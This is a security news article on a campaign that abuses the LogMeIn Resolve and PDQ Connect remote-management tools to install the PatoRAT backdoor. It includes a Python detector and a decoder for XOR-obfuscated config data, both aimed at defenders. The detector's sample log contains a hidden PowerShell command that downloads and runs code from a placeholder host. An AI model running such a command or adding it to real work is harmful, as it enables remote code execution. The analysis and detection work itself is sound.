Hackers Exploiting RMM Tools LogMeIn and PDQ Connect to Deploy Malware as a Normal Program

Cybercriminals are abusing legitimate remote monitoring and management (RMM) tools to deliver malware while evading security controls, since the installed component is a widely used, trusted administration product rather than an obviously malicious binary.

The attack campaign targets users who download what appears to be popular software, such as Notepad++, 7-Zip, or ChatGPT, from fake websites.

Instead of getting the real program, victims unknowingly install an attacker-enrolled copy of LogMeIn Resolve or PDQ Connect, which gives the attackers full remote control of the machine.

The attack begins when users visit websites that appear to be official download pages for trusted utilities.

These fake pages offer downloads for programs such as notepad++.exe, 7-zip.exe, winrar.exe, and even chatgpt.exe.

Download page of Digestive Utility (Source - ASEC)

When someone clicks the download button, they receive a LogMeIn Resolve installer whose embedded configuration enrolls the machine under the attacker's account, so the resulting remote session reports to the attacker's command infrastructure rather than to the user's own IT.


The malicious installer files have been found using names like Microsoft.exe, OpenAI.exe, and windows12_installer.exe to trick users into thinking they are legitimate.

ASEC security researchers identified this campaign after investigating unusual activity involving RMM tools in Korea.

They discovered that three different threat actors were behind the attacks, each using unique company identification numbers embedded in the LogMeIn configuration files.

The researchers found company IDs 8347338797131280000, 1995653637248070000, and 4586548334491120000 being used to control infected systems.

Once the attacker-controlled LogMeIn Resolve or PDQ Connect agent is installed, the operators use its built-in remote-execution features to run PowerShell commands on the host and download additional malware.
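The behaviour just described (an RMM agent spawning PowerShell that pulls a second-stage payload) is what a defender wants to catch, independent of which RMM product was abused. The script below is an added example written for this page, not ASEC's or the vendors' code. The lure file names are those reported in the article; the RMM image-path markers, the approved-RMM list and the pipe-separated process-creation log format are assumptions, and the sample log lines are constructed.

```python
"""Detection sketch: RMM agents spawning PowerShell, plus lure-named installers.

Added example, not ASEC's or the vendors' code. The RMM image-path markers,
the approved list and the log format are assumptions; the lure file names are
those reported in the article. Sample log lines below are constructed.
"""
import re

# Lure executable names reported in the campaign.
LURE_NAMES = {
    "notepad++.exe", "7-zip.exe", "winrar.exe", "chatgpt.exe",
    "microsoft.exe", "openai.exe", "windows12_installer.exe",
}
# ASSUMPTION: substrings that identify RMM agent image paths in your estate.
RMM_MARKERS = ("logmein", "gotoresolve", "pdq connect", "pdq-connect")
# ASSUMPTION: markers of RMM products IT actually deploys; anything else is unapproved.
APPROVED_RMM = set()
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Typical PowerShell download-cradle / encoded-command indicators.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|"
    r"-enc(odedcommand)?\b|frombase64string", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rmm_marker(path):
    """Return the RMM marker that matches an image path, or None."""
    p = path.lower()
    return next((m for m in RMM_MARKERS if m in p), None)


def parse_lines(text):
    """Constructed format: timestamp|image|parent_image|command_line."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, image, parent, cmdline = line.split("|", 3)
        events.append({"ts": ts, "image": image, "parent": parent, "cmdline": cmdline})
    return events


def analyze(events):
    """Return (timestamp, finding_kind, detail) tuples in event order."""
    findings = []
    for e in events:
        img = basename(e["image"])
        parent = basename(e["parent"])
        if img in LURE_NAMES:
            findings.append((e["ts"], "lure_name", img))
        m = rmm_marker(e["image"])
        if m and m not in APPROVED_RMM:
            findings.append((e["ts"], "unapproved_rmm_agent", img))
        # The campaign's key step: the RMM agent itself launches a shell.
        if rmm_marker(e["parent"]) and img in SHELLS:
            findings.append((e["ts"], "rmm_spawned_shell", f"{parent} -> {img}"))
            if CRADLE.search(e["cmdline"]):
                findings.append((e["ts"], "download_cradle", e["cmdline"]))
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_LOG = "\n".join([
    r"2025-01-01T09:00:01Z|C:\Users\u\Downloads\Microsoft.exe|C:\Windows\explorer.exe|Microsoft.exe",
    r"2025-01-01T09:00:20Z|C:\Program Files (x86)\LogMeIn Resolve\agent.exe|C:\Windows\System32\services.exe|agent.exe",
    r"2025-01-01T09:01:05Z|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Program Files (x86)\LogMeIn Resolve\agent.exe|powershell.exe -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/p'))",
    r"2025-01-01T09:02:00Z|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|powershell.exe Get-Process",
])

if __name__ == "__main__":
    for finding in analyze(parse_lines(SAMPLE_LOG)):
        print(*finding)
```

The parent-to-child check is the one that matters: an IT-sanctioned RMM agent will also spawn PowerShell from time to time, so in practice the `APPROVED_RMM` list and a review of the command line decide whether a hit is an incident or an administrator at work.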

The attackers use these tools to drop a backdoor called PatoRAT onto victim computers. This malware, developed in Delphi, includes Portuguese-language strings in its code, suggesting the developers may be from Portuguese-speaking regions.

How the Malware Gains Control

PatoRAT operates by establishing a connection to command-and-control servers and sending detailed information about the infected computer.

The malware collects the computer name, username, operating system details, memory usage, screen resolution, and active windows.

The sample stores data in its resource section under “APPCONFIG”, obfuscated with a simple XOR cipher keyed with the single byte 0xAA; because the key is one repeated byte, this is obfuscation rather than encryption and is trivially reversed during analysis.
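To show how little a single-byte XOR protects, here is an added example (not code from ASEC's analysis) that decodes such a blob with the reported key and, more generally, recovers an unknown single-byte key by brute force. Only the key 0xAA and the resource name come from the report; the NUL-separated key=value layout and the sample blob are constructed assumptions so that the script runs offline.

```python
"""Decode single-byte-XOR data such as PatoRAT's "APPCONFIG" resource.

Added example, not from ASEC's analysis. The key 0xAA and the resource name
come from the report; the key=value layout and the sample blob are constructed
assumptions so the script runs offline.
"""

REPORTED_KEY = 0xAA


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key for b in data)


def text_score(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or NUL (resource blobs are
    commonly NUL-terminated or padded). Control and high bytes count against."""
    good = sum(1 for b in data if b == 0 or 0x20 <= b <= 0x7E)
    return good / len(data) if data else 0.0


def recover_key(blob: bytes) -> int:
    """Brute-force all 256 keys and keep the most text-like result.

    Cheap and reliable for a single repeated key byte, which is exactly why a
    single-byte XOR is obfuscation rather than encryption."""
    return max(range(256), key=lambda k: text_score(xor_bytes(blob, k)))


def parse_config(decoded: bytes) -> dict:
    """Split NUL-separated key=value entries (assumed layout) into a dict."""
    cfg = {}
    for field in decoded.split(b"\x00"):
        if b"=" in field:
            k, v = field.split(b"=", 1)
            cfg[k.decode("ascii", "replace")] = v.decode("ascii", "replace")
    return cfg


def decode_appconfig(blob: bytes, key=None):
    """Decode a resource blob with a known key, or recover the key first.
    Returns (key, parsed_config)."""
    if key is None:
        key = recover_key(blob)
    return key, parse_config(xor_bytes(blob, key))


# Constructed sample: what an extracted, still-obfuscated APPCONFIG blob might
# look like. The plaintext layout is an assumption, not the real format.
_PLAIN = b"Host=c2.example.invalid\x00Port=4444\x00Tag=Pato RAT\x00"
SAMPLE_BLOB = xor_bytes(_PLAIN, REPORTED_KEY)

if __name__ == "__main__":
    key, cfg = decode_appconfig(SAMPLE_BLOB)
    print(f"key=0x{key:02x} config={cfg}")
```

Extracting the raw resource from a real sample is a separate step (any PE resource viewer or a library such as pefile will do); the point here is that once the blob is in hand, no key material beyond the binary itself is needed to read it.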

The backdoor supports dangerous functions, including mouse control, screen capture, keylogging, stealing browser passwords, and even installing port-forwarding tools.

Security teams recommend downloading software only from official websites, checking digital certificates, and keeping antivirus programs up to date to prevent these attacks. Because the payload in this campaign is a genuine RMM agent rather than a traditionally malicious binary, organizations should also inventory the RMM agents present on their endpoints and treat any that IT did not deploy as suspicious.
